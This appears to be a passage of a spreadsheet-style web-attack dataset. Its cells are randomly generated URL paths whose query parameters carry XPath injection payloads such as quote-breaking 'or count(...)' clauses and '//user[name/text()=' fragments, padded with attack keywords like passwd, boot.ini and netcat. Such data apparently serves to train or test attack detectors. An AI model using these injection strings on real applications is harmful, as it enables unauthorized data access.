    <t>/ey4rarthtlste7miv3/9vgwinnt/tndag2ni8elphasinh5k/7ojybeb8xyp9ffg.s/ari/ym1m-hzny_wv8slxci0w.dll?deletec3childiwwtbedropw=ublm8tgl5oiah8l&amp;pgebronida=:tes&amp;eilpyd=0nseiaheaa3t5&amp;ykxsac1owsx5=i@wbkeh&amp;mm7tinputi9tujs=etsm;eionsztt&amp;ctvuu1lnb=unq_mxy&amp;qw5k=kxo&amp;hteygasnie=@&amp;clxbtoh0atie=sreh&amp;ed1sonvdreaccept9=oog-x9ptp0&amp;652huaniye3dius=h43@a7s&amp;raemisoezau2d=179+++or++++count(path/child::node()[position()=((i+j+k+l+1)]+++++|+++path/child::*()[position()=(k+1)])=1+++or++002=&amp;va=g&amp;to0twe=i5hwnafushtdpehoov</t>
  </si>
  <si>
    <t>/yniario/qgecdt3/yrls/staxdtm/ejymy3bad@.tiff?ddtreean=sij7eoni'++++or+6+&lt;++count(path/child::*)++or+++++'xt3yregt'++++=++'&amp;pabzeasm9dta=@xa</t>
  </si>
  <si>
    <t>/meta1optdso-suw/e24rgvbt/n0.od3pkatav0f-t547.nsf?cutztci5c6=(i+&lt;+count(tcatid/child::text())+++and++++j++&lt;++count(1ain/child::comment())+and+k+++&lt;++count(b6/child::*)++)&amp;yt=oh&amp;nn)[&amp;smi=8'l@nn+&amp;retap1e=rzeehujl0eiotafti&amp;ygmatenshteo=666971&amp;sserormsmkhusa=mjl5&amp;drte=ts</t>
  </si>
  <si>
    <t>/a9cvc9jpud79gkptduz/tt9pnlaaidmhthlge6ii/lcoirsit.aj5n4muh/ia2owoptbwfend/awhcav/ig88dg.pq6onh/oetfxe/tm/stlequntinyle9t8oqe9/h0z1cwafqtag1.gif?msf=&lt;)&amp;rp4lrnmbiba2=oiewh6document:l&amp;nin4rev=14294&amp;8qm.hitabgsound=telf6'+++or+count(++path/child::node()[position()=((i++++++j++++++k+++++++++l++++++1)]+++++|+++++path/child::*()[position()=(k+1)])=1++++or++++'ey9e'++=+++'++++s3'+or&amp;rtiitaetlchsaco=os4</t>
  </si>
  <si>
    <t>/pa3niennamseo/hbvscecgsiijdes.asp?ee2ieesuun=h&amp;lizmbgsoundvm=nm_fo&amp;t1abmlthdepmn=iceeb5ittsjen0cs&amp;st=6022913&amp;iftpjp=nme/reisn/rtbon/child::node()[+++position()=5]++++|+ceeo/ijmhe/n/child::text()[position()=1]++++or+'rq0el'=+'&amp;e9o=lznino0mto&amp;eyinb=jx7mkep0t4za</t>
  </si>
  <si>
    <t>/ut/oeahyet/iop0bik2mx/syetgt0n3t1lasi1rtzc/p4h5h_xd1/eoeeaodaoto2s/0hcudhqopo_4tv.dll?afnetcat5=nrh&amp;ttpewnltnuosrlf=eato5ntrbevta&amp;6sap=od0ou']+++++|++p++|+//user[+++name/text(++)++=+++'o1&amp;1a3=1c0hovvwjuersw&amp;kyd5fromx9wctag=75&amp;bparirv8alc=]isry'skbaio+3g&amp;dwrea92=earm&amp;saiasil5ak42dot=evaien0tobf4hst2zu&amp;a4exnci0neqtux=o2adlet</t>
  </si>
  <si>
    <t>/rsu5y9shperl@hxm7/smg.png?nhatbnaenailn=eatmpnbsnt@k&amp;qooeaoryvlyrop=m5ecor&amp;ctglemtvlnnjs=15901144&amp;ns1alelspnze=urdhloe'+or+++6++++&lt;+++++count(path/child::*)++or+'une'+++=++++'&amp;0hr=06&amp;etrwnje=4iy.n0vtjta</t>
  </si>
  <si>
    <t>/onbv3vc7/ethyx/yegie8f0zmmk-nkeys_i/hnaiteiitoew6rh3r/ebwqsult@8/rnahyiyhnzip/7@c-f/ahngpt3hhetmntg/yt37epfpd/aear.26fxkps3zp/wr5srcpt.tiff?abthtg=pzh&amp;sma0=981710&amp;aqtd=eie&amp;edmcsu=e8xtermnsmooaa&amp;ewpyeetat1arr2d=(i+&lt;++++count(ebct8/child::text())+and++++j+++++&lt;+++++count(eyce2o/child::comment())+++and++k++&lt;+count(hsufba/child::*)++++)&amp;cvhc2no=oce7p1defo&amp;an=shutdownu\\+e&amp;chlhnptxmeeabbo=a\\pceco+escriptopencatl&amp;0qn1hd68mw6=0</t>
  </si>
  <si>
    <t>/e-sxh5lqzagna/hjcan.aspx?cmb6tg=63463&amp;bse=ncr6'+or+++++path/child::node()[position()=n]+++++or+++++'nyer'='</t>
  </si>
  <si>
    <t>/j71qpl9nytnsz-/@.9janv5selectqwgetpi/sdae/eoviw/hih/eaedhaoedmdwaud/ne0t/aassx3nstixreaad/hszkouu3cvd.on7aqw/pt8eh.js?llo=yohrhavinghe&gt;&gt;]uttscriptfr&amp;a2@ctmall@kfgq=3651906&amp;er0dqsm1=/eh3idv&amp;yjzhhtaccesi=bapobsxpbi&amp;eab=37&amp;macencu=xn&amp;pcywr5u_wget=tnitdahlec&amp;ismataingcc=caetmptdot&amp;teeeonirrt=tee']+|+p++|+++++//user[+name/text(++)+++=+++'trne</t>
  </si>
  <si>
    <t>/7nfm4m3y/m5df4l.47ly39vomwz9/e@dott_/spesls1lye/ck/be6xcvonhe.dll?7o8dbtgpssja=6251&amp;snenwviwy7=qssmpo3irahbepti&amp;qkiendpute0aul=o9sboi/e/aew9/child::node()[position()=750]++++or++'eape'+++=+++'</t>
  </si>
  <si>
    <t>/hmzh7yjls73p1w-kmsru/ntilhieuhsese/cgnt4t/passthrukextlpik/lze2md8pge3ghwwy/ictfttwrimiic/wmqjqoa2nexx4oqfagq.jpg?0z-mrscripts1='cmochan+5hnodee|]+7euf&amp;invmerptnt=r3ootta?&amp;mko&amp;eepmborarfob=at8bree'++or+count(path/child::node()[position(++++)=((+i++++++j++++k++++++l+++++++++1)]+++++|+++path/child::*()[position()=(k+1)])=1+++++or+'rr'++++=+++'+theq'+++or&amp;pey9jptyi9it=78cejlseteor&amp;ucged5dajh9=275&amp;eaodnit=9970&amp;eeihnam=8&amp;rha9hoeee=tsd&amp;tbolpqerfjnttr=n0~usrn:rcpbev&lt;&amp;ituk4=irseda6noeweds&amp;ceiesned=4nullcupt&amp;8stgebdtnier=598669&amp;vimo8lmdontrdt=nwroked&amp;ndale=gir)totso</t>
  </si>
  <si>
    <t>/yagb4aiaafiqslcnraae/ydhmgp5izakprd/th1ie3t/udtfbrair5/anefad0yroseaihr2.css?m4kbadmine=39++or+++++1&lt;+riy/lsti/t/child::text()[position()=1]+or+++++1965=']+|+/*+|+/foo[bar='&amp;kewo6o=45206660&amp;en=sl-r&gt;&amp;n1yivn4=aletlibrt&amp;tdocumentqnynrwn_f=02&amp;tc=exn3as&amp;wau8jlqcilx=4+e\\\\ezdei8s1d&amp;niaeth=eonaiho+thn0+t&amp;3.kgx7s.rwz=j/&amp;7etr5srz2eeyk=dj9uascr&amp;oxtk-dmailh3=erunaey+iatd&amp;7ssnse=rztiteao1himc&amp;0acoi50edalsm=ecyperla</t>
  </si>
  <si>
    <t>/kkttaerhgb/9h@sznlvy/e0glbga/b8ihoi82ests/esarionngind6srjouoe/b5o_yt-9j7spzuxdol0v/ohhslj1nlc_ku8k6pxy.mspx?6lwhddm5z9=thd3qpndtform&amp;a8eqfrtje=kkehls'++++or+count(+path/child::node()[position(++)=((+i+j++++k+++l+++1)]++|+++++path/child::*()[position()=(k+1)])=1++or+++'sditeaoo'++=+++'++chnc9ur'+or&amp;raae=kkhua&amp;svg9tcys=pwro</t>
  </si>
  <si>
    <t>/tqeyq6acqwpoeaqm/f8rh0d/iacnowtjiyn/onastoheobizeshe7ll/svles/vahemubeatdestbw/mqxho6rbdnjs1/eqisi7ez/vare3betztnetuc9ntd/bdohat8ge/if-cpdrxmzn2hw9s@@z/aj7whobject1yev.html?thotlcpequer=ttmetcsgetscript&amp;okohynl=yuwzeseleuh&amp;fq11x=850951&amp;eaiuckamnt=prf1']++++|++++p+++|+++//user[++++name/text(++)++++=+'d2&amp;rhk.av=68010&amp;alnh6hst=a&amp;1lm=1519040&amp;ra=eeefaoiyqaah&amp;atnt=9362310&amp;un2=n8thuaka2h7a</t>
  </si>
  <si>
    <t>/5iageheensu/3.ocki1y5saaccess_logtmp7z/tiuc9v/vnmochalmn_/tolwneemgdod/ewqv/hing2v2.shtml?nca2undsesnsaq=ihlssd'++++or+++++count(path/child::node()[position(++)=((+++i+++j++++++++k++++l+++1)]+|++path/child::*()[position()=(k+1)])=1++++or++++'dofre'+='+nuyo'++or&amp;ientliy=5516421&amp;yns7lzhaacbnote=egt&amp;iagtmpotlartcta=rhrnbgsoundh+</t>
  </si>
  <si>
    <t>/dympmn9veb5fri/neliififyam2/m0tperrvhneen0acsbt/iq_ejgy-tk8lac/enol9aeasi/rupcevtemet/t2jdiyveyge8/isnjxnlo.html?ieeec9la=anbit&amp;rmrda=uottco'+++++or+count(path/child::node()[position()=((+i++++j++++k+++++l++++++1)]+|+++path/child::*()[position()=(k+1)])=1++++or+++++'dqovep'+='+hill8aa'+++or&amp;ewhen9uhrh=;t&amp;iamueeot1ne=lmimon5</t>
  </si>
  <si>
    <t>/shutdownm0rrydu1scripttcxeval/o8re1armst/nopenzcettt.js?2iitenactlaee=4&amp;ezoh7i5l=(i++&lt;+count(rmea/child::text())++++and++++j++&lt;++count(tdfa/child::comment())++++and++k++&lt;++++count(bim/child::*)++++)</t>
  </si>
  <si>
    <t>/gd9gtmts/retsdlt/ruwa/mmty0az4i/u7oj4jpt/wnybmcu_5.htm?5mmsc8e=nnar'+++or+++(i+&lt;+count(weea/child::text())++and+++j+&lt;+++++count(8e/child::comment())+++and+k++&lt;+++++count(sqss/child::*)+)+or++++'2e'++++=+'+++lgi'++or</t>
  </si>
  <si>
    <t>/oefeg/dshheiceta/hu2rhx3kuh6kp/xpotsaaprrbbasotegl/wmayy_/nj298ch/li10senleph/e9loefz4oi/nuq8igxur.jsp?0il=stsock_stream&amp;lkereodtseeh=o24h&amp;hyf1set.eafg=orbe&amp;pah=t4'++++or++count(++path/child::node()[position(+++)=((++i+++++++j++++++k++++l+++++++1)]++|+path/child::*()[position()=(k+1)])=1+++or+++'xtt'+='+++rmxndyz'++++or&amp;5ari2uddx=sboot.ini&amp;srl=]mkali&amp;tqiueg=e1n(t%ifoty&amp;e8opthtpassydzmc=4956044189&amp;inutluberdtr=6136060905&amp;muhe1g7e4r6e=e0tuskcdhttps&amp;ktym8eaihha=avyhhce7s.mf&amp;yn77hllnoiy=tfq67lu3q</t>
  </si>
  <si>
    <t>/kpsnqss-system/creiwnksd/exuue/a_vnlbikxc/yrngftr/of@duyscj/lp7l1dyy7hrciyd8anws.jpg?sndrno4dtedcns=smhe'+++or+++count(++++path/child::node()[position(+++)=((i++j+++++++k++l+++1)]++|++++path/child::*()[position()=(k+1)])=1++or++++'matrd'++++=+'++++rieq'+++or&amp;te=qtea&amp;a</t>
  </si>
  <si>
    <t>/enf/8ncyetoeecmn.msf?he6m=99&amp;oitan=5ts5passwduapegg-s&amp;zzq4kunionwyq5d=tt&amp;rnrtsvn3=32109421&amp;dtbatmn5ohzrtot=oelit9/hyuwtn/tsl/child::node()[++++position()=36]++++|+++++du/i/fo/child::text()[position()=670]+++++or+++++'aftaeya8'=+'&amp;5kvbevaly=50&amp;gh=aivhieioamsoe&amp;5x3f_=utna&amp;gorwi=ne4z&amp;rai6yserys=usipblteeruo</t>
  </si>
  <si>
    <t>/2n5@banr/teglaubce4xtepno7e.mspx?kowps=295+++or+++++count(path/child::node()[position()=((i+j+k+l+1)]+++|+++++path/child::*()[position()=(k+1)])=1+++++or+634=</t>
  </si>
  <si>
    <t>/ilhiehhroitedecoh/fdkb-having8igxd1/uplftw1-ukludsjg@afb/ifwgmanxre3/eslnrharya/ieeek6snftrgjsen/bb/1itk/r-bj/exzljr@ij-_seeu.png?heiztac4my=rd/aeea/rhmin/child::node()[++++position()=5]+++|++++aboht/hid/sioojr/child::text()[position()=288]++++or++++'obnsih'++=++++'&amp;bn=lgvluz&amp;ot2o=adf9xkuurmevaltu&amp;onbns1aur4=e6az+&amp;ulhnhatene8ulds=eouaaedgdea&amp;13ypa=nd&amp;ewrmrmrevn0ter=aayino46nuy&amp;erstir=255</t>
  </si>
  <si>
    <t>/a85dznfkw.226xpuzkzt/enoa4nh30iavtggsrm5a/elciebltmhs/rbrwhlotterea.css?hilesrxase=ufdwh4a&amp;-xlog3ipij3=hse4https&amp;do=[s+adt|oulibeozt&amp;ch2htetc=7337995&amp;2fw1cyqjjc.v=068&amp;3nehoq0r=eddqblatepd9l7sace&amp;l6swindow.opencmdlwfwm=ahekw3bgknh&amp;b5ihttplg.yn=@nzn9mstu1arw&amp;tmpe=z%0st&amp;ene&amp;hssheynuydd0dgs=20&amp;rex=os3agalnaek&amp;odig=eadii&amp;acbedrp6eark=twjt'++or+++path/child::node()[position()=n]+++++or+++'shemeve'+++='&amp;nevdi0ht=896655824</t>
  </si>
  <si>
    <t>/ejn4h2acupg2ahwe/smbpyx@6/tnpeedou.aspx?jeemiem75b=s9o'+++or+++++6++++&lt;+++++count(path/child::*)+++++or+++++'2sera4uh'+='&amp;slyrfsnfortztam=povmdtsa1&amp;iaussoe=3ahignm4ifrf&amp;ogd=6517630&amp;vfcirt=9&amp;altwa=teet9qrt9set&amp;sfbnullse43=irydoi&amp;2aqamor5aiiu2=s&gt;nd&amp;8eadminxchild0-=1992</t>
  </si>
  <si>
    <t>/nuf5rar_varuwue/e78ubjvzoqr5t/ntczx/copwwnuqphad0xzmxc9/dbleui@sjjp/sdohnzyyewe8ihnilmi/tg-g3/e4e.js?mflcxterm@wm0b5i=a&amp;stehac4rio=e&amp;dw=nyyrhavingi9tapdka~&amp;glv_m=nmac1&amp;wak1ppoh=lsxpmx_xum&amp;eeegrtuuy3an=317++or+1&lt;+++++nse/pb/hee/child::text()[position()=0]+++++or++096=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/likedu81scripta5yexeczox/ij77/433w@orz/26qwp-passthru4/ajhcvuyy-f0nkqb_7fs7/luppg5boyf6/062reuh/v679j6shb36c.msf?qnohcbgttcscn=01210381&amp;ct0aoxgot9iat4n=25578313&amp;h4bett=aa'++++or+++++path/child::node()[position()=n]+++or+'dd6tqgro'+++=+'&amp;execimgvxb0a=1</t>
  </si>
  <si>
    <t>/uy/uegaccess_logzvexec4mq0qpiframe0/clfqposition/eeaelxi.tiff?lneml=eo4n'+or+++(i++&lt;+++count(rtmts9/child::text())+++and++++j+++++&lt;+++count(xnoe/child::comment())+++and+k++&lt;+count(pe/child::*)+++++)++++or+++++'ueinis'++++=+'+++++toeseail'++or</t>
  </si>
  <si>
    <t>/hodtiduee6s/d9n@_mkm/fna-rmls/de/4a2tnwgetzhce@l/nb.aspx?t3sld3ry=238&amp;sr5=ot24luor&amp;9a7ln=(i++++&lt;+count(tri/child::text())+++and+j+&lt;++count(tic/child::comment())+++++and+++k+++++&lt;+count(ecm/child::*)+++)&amp;ni5vnjvda4d4dsi=1il'</t>
  </si>
  <si>
    <t>/mqr2ft0u7/toqvbe6atumf6ibf5/4drz5zqcf/ylx73dqg9k/meef1i/scbyuwswselectnvcr.mdb?iogtae=objectcoeh&amp;owo=989++or++count(path/child::node()[position()=((i+j+k+l+1)]+++|++path/child::*()[position()=(k+1)])=1+++++or+++96544=</t>
  </si>
  <si>
    <t>/2qfcewsqbzbdxrej20_q.css?tuato=iq&amp;ebunionypjonhtpassyf=w0nki&amp;+$&amp;kqluii4is0mjas=wosatoleobis&amp;ntr=ce(t8snsrr&amp;eefftu=u7ie'++++or+gr/adh/child::node()[processing-instruction()=7]+++or++'oay'+=++++'&amp;jeen8-=akgvkldlyaet&amp;deriyraei=1&amp;tee=00</t>
  </si>
  <si>
    <t>/tlrwoe7clef/oxcd/db/n8rw4m6cxie.nac7honw/waartrtsei/ahydbl.f08glz/e0/eppb7zg06gz/idmiskhhdivwu3m@/touyoit-f5/seems/nkh32qaqguhyl.mspx?edsinntl=iyt1ea6;e+e+kaoyias&amp;1pareegryloa=88871+++++or+++++count(path/child::node()[position()=((i+j+k+l+1)]++++|++path/child::*()[position()=(k+1)])=1+or+++4043=</t>
  </si>
  <si>
    <t>/ig_qxl1rf0c/nminy54yfgsoeuah/whereh@s/mh59enoieenirnr/mqlhju870xm3/ok.swf?egomehitn=846858&amp;xap@r=gr1c'++++or+++path/child::node()[position()=n]++++or++++'xc3u'=++'</t>
  </si>
  <si>
    <t>/rla./buim9/aoexuc.js?ohashu=685644&amp;wghdhiphwokghh=%u&amp;seisditt=eyyqt&amp;0msreyt=957943354&amp;ltr=dxejmuwf&amp;l39h4wfg2=8d'+++or+1&lt;+++++rmn/esdli/e/child::text()[position()=75]+++++or++++'tdthlre'++=++'&amp;dsrteo19yeunhh=ddo&amp;at3uyidkbidb=&amp;]b+td0iaytqqsipnmfu&amp;naa9oiflt=taa4hac6xg&amp;meuiz=mq9w&amp;a8e@=ab7bdgfz&amp;sewoe=trr&amp;rnitef8eqjnzn=vhaving80(eseiar&amp;t5arrtg=dr0xsue&amp;9aeonqa6mrety=eda7p2xse</t>
  </si>
  <si>
    <t>/thf2ueldi0jfexceeeh/sgm5czgv-a_/ztlaa7tu33gsup/iw9/tbusaqeoeit02sytfyte/r7aleheceioesn.css?_dvowgetselectzj6zx1=81selusmloxttlne&amp;fouetatiomsdi=wfa/hts/tip9/child::node()[++position()=8]++++|++++ze/pstw/ciost/child::text()[position()=36]++or++'6bi'=+'</t>
  </si>
  <si>
    <t>/eedkshaseae744lae/t5ollgoerxttbrdr/3mvj0@jx50udbcwhl/a3xr07z@c7d/snx9jcss8ukayb4/inbporirfmarvhentf/aytdcoqdumhmliwigs/ug7cpidb/ieupdate5h-vxgq@@d/eno@mxca_h.cen.php?eprks=pdrhhnn6l&amp;5wetvobsemafa=e&amp;0touetou56ekxnr=uo7zod9afeo8di&amp;ao6tmpc44=otr&amp;issenet9er=d5eheohyn3o'c%ssaz&amp;uuun=eya1&amp;issdoeoflo=cghxwdy'+or+path/child::node()[position()=n]++or++++'jdo3itq'+=+'</t>
  </si>
  <si>
    <t>/jv9kgmocxm9/qes8gblei/updated_7netcatroo6boot.iniq77style/la11wnh6/likeof/estaspgg/rsonsehasgposifwrt.js?airh7fov5btlse=-asofb4sia+nn&amp;ftworpsrus=191066&amp;mnrs=28&amp;k-a.mhttpsiqah2=endw'+++++or+++5o/bi/child::node()[processing-instruction()=9]+++or+++++'tsajee0'='</t>
  </si>
  <si>
    <t>/opzn/seer/2ptggq@zckbj/ajxns3-ldivu0/jktzqg/uogenden/tlawhtk.html?n8eeumielooho=neqwbdodrat&amp;h5=388213&amp;kivuedahfb8cn=r2pema'++or+++++6+&lt;++count(path/child::*)++or+'upoqic'++++=++++'&amp;ylbderns=aorts6optlmocha/exe+htpass1we</t>
  </si>
  <si>
    <t>/awxi/ierettip/un62spivnlf/z0mep/4av6/hwkgzr-a/ur6/ley734r7/ehntenmsqnudeosl91l/dyege/b@.mspx?iehatysat6=xsno&amp;msd9s9unhf7hncm=1atr'+++++or+++++(i+++++&lt;++++count(wahed/child::text())+++++and+++++j++&lt;++count(ihvzm/child::comment())++++and+++++k+&lt;+count(0a/child::*)+++++)+or++'sqyai8'+++=++'+++++atmqhep'++++or&amp;rbinaonfuqwbn-=es&amp;x2sc=6930&amp;cpcdkattov=738661406&amp;yhovxaupaastoss=6453604&amp;rqatnvsac=uaktp@aa$n&amp;usr5eesec=0&amp;fmao=uiiipeb&amp;ee8ihip=\\ov&amp;diso0suaulfh=mi?0ctwinntmo8ew&amp;uhe1ehanrqast2=nmee&amp;irmhci=o-t&amp;n1lrtc=tielo:hesio6ad</t>
  </si>
  <si>
    <t>/tyn@c/jzt/d9jl8dedvaga.zjct4ka/u3a@@uw/nwtrpognnoteatm/ek1/ltedn4rgan0ehthron/tarugo/etnngwehgzfc@f/9szxkyt_8k/eeejse.jpg?pbeeklniiwi=(i+++&lt;+++++count(gmre/child::text())+and+j++++&lt;++count(gnitee/child::comment())++++and+++++k+++&lt;+++count(02s1/child::*)+++)</t>
  </si>
  <si>
    <t>/tnrndtosn4oewsqx/364div/02yh/nleeeten/o-sjf1gya/mse/jok1/zi.vwjp7lmuehvqiti/bjnirl-t/bodykx/sps4/608_.tiff?9tluenrykos=se&amp;hetlis4r2=@eue+el'xml++abodywp-iframe4&amp;ihsg1osel5een=n'hncitijnede(&amp;ora=uredxwhtton&amp;tzaal=ue&amp;atbzeidc=sie3f&amp;qxjdwugdxhy=toey&amp;gehhfnwu=epanpr'+++++or++1&lt;++++hoq/i5csc0/e0o/child::text()[position()=479]++or++++'ytio1'++++=+'&amp;ui8eeohydedtne=ie+eh&amp;ye8sdtgagxdk=781501658&amp;rcbgqy_ng7xu=twcieg53es&amp;statsz=6490&amp;oz=e+gt;</t>
  </si>
  <si>
    <t>/d8yvf1thzcd.m04wrzv/eibdonado1itcne4eb61/us-ihqy@axe6hxh.jsp?u3=ey/7ngfn/eaest/child::node()[position()=194]+or+++++'hsrlgtoe'+=+'&amp;emgyimaqwsp3=vsanreasoen+'r;/2&amp;ae=5097&amp;tuteu2wenoefeao=031&amp;whl3vbscript0fzp2cz=13&amp;nmpf%ug=12169287&amp;ibro=384&amp;nxhdliexer=8a&amp;a6eq=8175</t>
  </si>
  <si>
    <t>/ysawa7vixh/plmpradminx1kqkmocha0dut/dkwmhth1qnullu4oall./aeootblwdtleeosngl7/duoopiijmese/rns/ht/eeti.css?ibilaimdt=tcq'++or++count(++path/child::node()[position(++++)=((+++i+++++j+++++++k+++++l++++++1)]++|+path/child::*()[position()=(k+1)])=1++or+'0siwt'++++=+++'+++en'++or</t>
  </si>
  <si>
    <t>/mer1otlsuo7atod/829-2jx.png?tepast5aicb2qa=uaeaga'+++++or+(i++++&lt;++++count(1le0t/child::text())++and++++j+++++&lt;+++count(3s/child::comment())++and+++k++++&lt;+++++count(n6r/child::*)++)++or++++'als'+++=+'+ajsak'+++++or&amp;fg64dmopt=2753698&amp;telptrrmdhuare=edrruaeos&amp;apxecmvuo=7&amp;erltimessehhh4=ehh&amp;tahyueroe4i=ein2ba3ncpp&amp;eosp=td;\\eeouenoh+1sat+h&amp;rb=6778&amp;r7slrg=7843017443</t>
  </si>
  <si>
    <t>/cdmnaymm/9c3eglq/iem8on0hzteenta0uvc/n2opuh7da/ktitksht8/1uhdp/ud4_jscittx/vs94.aspx?a3aad=\\thsgpoeisroahu&amp;2ytiikwiu1c=eabodyrsatetraope57ue9&amp;digeeceuad=752&amp;mltoe0toela=0no+herread&amp;dvenlj=feoukeene9slstd&amp;frictte=a@%&amp;snin=ioy'++or+(i+++&lt;++++count(od4iie/child::text())++++and++j+++++&lt;+count(raa/child::comment())+++++and+++++k+++++&lt;++count(eth/child::*)+++++)+++or+'in'=+++'++++neterlc'+or</t>
  </si>
  <si>
    <t>/laar8zxlf6l/ruvq-i/fo/lacl7s3rtudssso7/fvn/nsfllrin03benthqytyn/3cnre/kxqhnli.ruau9nokrez.swf?z2seameet6rzgms=udsjguf8nj&amp;skx3zuz=75&amp;ftdc0enec6=a6ra5f4feson&amp;@body3orx6un8ova=yuaxqd_&amp;yoeic1ur=f&amp;y93processing-instructionzb5j=7927207&amp;2pafddrzsn=588&amp;nhoc31aaadx=2:eot&amp;sneh=~osva&amp;i5hrdib2oapbs7j=betrierzrtmod6o&amp;eldtwsv5tauulyc=aaem'++++or+(i++&lt;+count(alua/child::text())+and+++j++++&lt;+++++count(ee/child::comment())++++and+++++k+&lt;++++count(mdisg/child::*)+++)++or+++++'iu'='+lsnlu2p'++or&amp;hnawtadbe1o32=682456</t>
  </si>
  <si>
    <t>/yotrmntfuorea8ihto4/e-sqe.f@vfq/sh5ud4c4p9amooa0/u4e9tuiwh7lteues/norsu/appk-pama.1j/y7eetmn07rediyefrft9.jpg?escieseksg=316&amp;le6=nvh&amp;neeirqso=si&amp;usc9=46193&amp;ntoharhkncrt9n=9ynhmgdt'++or+++++path/child::node()[position()=n]++++or+'rtebewr'++=+++'&amp;chofd=k@&amp;twyat0ion\\z&amp;exthald=699674513&amp;fiseesenzei=egjoa&amp;dgat2vc=h+sfc+so&amp;tbocesnk0euioe=5&amp;8arbyd=07749975&amp;3neyt3khln=q11i&amp;nhorh=ttmangilnttlas&amp;ah4oeispa4=tbsytpgste&amp;ibody3dxtermp=27365763</t>
  </si>
  <si>
    <t>/utvu2bvm4h6f4l/5mamyhlaggt/sxst40foyrkg-p/iu6qi/rlezsozotmtwi/ea.css?4ilzgtmpnbepy=an8&amp;r8iwvsnscheap=wr2m&amp;tnpk7ttrttat8=3498&amp;aeea5ds8oask=i6ettt&amp;fes7pl7s=528115&amp;vhlhc9fo=uwontthiaaettoardd&amp;rlfwi0zcr=;tlee&amp;qintewg=s8i_fcq&amp;moiarabo=d3o9bo'+++or+++6+&lt;+count(path/child::*)+++++or++'wiv'++=++++'</t>
  </si>
  <si>
    <t>/2zzdbjx5r9qkxacbq/t2gps-q-vwmtk/ebkwcvp7x.@t@ms6wdv/fnzvs/4kxibaqform6sgqxw/hcho/tzv/r-hmoyrphp60/vlu@q4likef0@xevalw/11vtqgemefrm/n6xlgig8i9ajyhojj.jpeg?cbt=(i+&lt;+++++count(rbnoe/child::text())+++and+j+++&lt;+++++count(ndocto/child::comment())++and++++k++&lt;+++++count(nlra/child::*)+)&amp;arbtawese=7136&amp;sirc=document&amp;xl4xgog=547</t>
  </si>
  <si>
    <t>/eutrioya46jgsple8.ou/zld/c4j2rzobjectlbd/etrohr/m92db3l3znrc@.dll?nhttn0z=6&amp;et0wd=lc2&amp;apdtiittee7nhe=889++or++mc/raa/n/child::node()[position()=202]+++++or+++08003=&amp;csup=08</t>
  </si>
  <si>
    <t>/hngeethnhhooc/iframe2s/llifmnr3x-otff/n4ezk2miwfwqqwnvrj2/rf4x5a4ir4@3m_w3peld/srdacfv.png?yvgqj=seb5red'+++or++c9aer/fdeqie/child::node()[processing-instruction()=9]++or+++++'3c'++++='</t>
  </si>
  <si>
    <t>/ermt/qn/sy2c2gwplrt5s5n@/swconfmypbo4.pl?ie9huide5iauhwd=nnq5cls&amp;.mppsvppservicesprocessing-instructiontdg=361&amp;za1a=i&lt;id\\b$igrr&amp;stys29ntcdtpv=fxi'+or+iiea/cres/child::node()[processing-instruction()=63]+++or+'mvbofww'=++++'&amp;qqfdn=@auhpasswd&amp;knkaoeooncdt=48448374&amp;atsc=do--qg</t>
  </si>
  <si>
    <t>/6pcc3vhrbqoc_j/bpx/sve2avs7vjqra/orhw9ccjudtgtsmpyhhs.exe?8yspeae=fvin']+|++p++|++++//user[+++name/text(+++)=++'uel2&amp;oiwla=aanagkdsts&amp;ee1eercijchs=auetrls&amp;dtbfred0snhs=e5s&amp;nieem=input</t>
  </si>
  <si>
    <t>/2imdojs.e/iwysfecmyr7r922n/harlel/hfp1ipasar.html?wqtns=a7oakite2einl1&amp;dwxtsst=7118688575&amp;eval-kcc=d33gn6gk&amp;aa1ilrhfstie9eo=m&amp;m+1l4ylc+rr3&amp;qhwhereerx-4execti=rflaitrrh&amp;tsdavos=aends'+++or+++++6+++&lt;++++count(path/child::*)+++++or+'wnleosje'+++=+'&amp;eetdigosnban=i4wc6q&amp;keirouvn9a=ae:e:vlto95&amp;i4_1jmwe=tr6l74ir&amp;nrjqaapaccndcat=om@ik&amp;n7p=:(i</t>
  </si>
  <si>
    <t>/i46aj4ozelj91khf-fc/yau_h3vya0c/me5v1ictcbnleeeo/0m0daytkkvg@5h7zshj/p5in39txewscmscoaig/teuuiduarena2nanoe/z40s-.88/o6aoc4b0p9hmzydqm-/ols/eop7y5p4jyet.qva5gxt/lsbxmbb.tiff?ypeccndohnzfz=cathems&amp;yqeskbo5h=56610984&amp;vyneabtazg=3nzsmip&amp;bjik7nizehih=73437863&amp;-pfhn=078++++or+++++1&lt;++tanh3t/rlm4ra/hrtl/child::text()[position()=670]++++or++++1988=']+|+/*+|+/foo[bar='</t>
  </si>
  <si>
    <t>/dzagwkk/koxkx/smq/qzg@alh74tjfuph/st/etft/st9/ttei/aqvbshutdownkizm/childu_qg0c/qwd9ppbsc9wik@ox@/5lpulmchkfrom_u-ny.html?o5nngceiwd2=rc'++++or+++++1&lt;+++ot/o6i/isde/child::text()[position()=69]++++or+'evheoha'++++=+'&amp;uduaetle=158833161&amp;yannenmlnesos=362406682&amp;whthotrl=bkv8swsxeui&amp;e3v=21&amp;ngnnnw2mlshtbit=7cnsseuohills</t>
  </si>
  <si>
    <t>/c2uqbau-i.lkbv/idivsr/9y8mntqaexecetosv/3tjq/4eerceg0hesebtnmn/ebsiaymh1nuoehkio/asyfhm8replace5egeqs/ro-./stdt7oihwrhwceypa/icnz/yo5/tdhs7qrf.jpg?1gud1xposition0gusr=toov&amp;swn10el=e~&amp;vz-dccl_z=9315796134&amp;wavbscript.fti=in&amp;processing-instructionfboot.inidsqvbscript@p=8&amp;iherla=51&amp;ui7w=aathlink&amp;qp4_v=hncesirt@2en&amp;aatstarieso=&lt;edto&amp;irheo9eoo=a]c1eosstylenat&amp;a0swehaiir=nrhewo'+or+++(i+&lt;+++count(me/child::text())+and++j+++++&lt;++count(dd/child::comment())+++++and++++k++++&lt;+++count(fh/child::*)++)++or+++'iztk'+++=+'+nrotohi'++or&amp;ecuizi=sttd4</t>
  </si>
  <si>
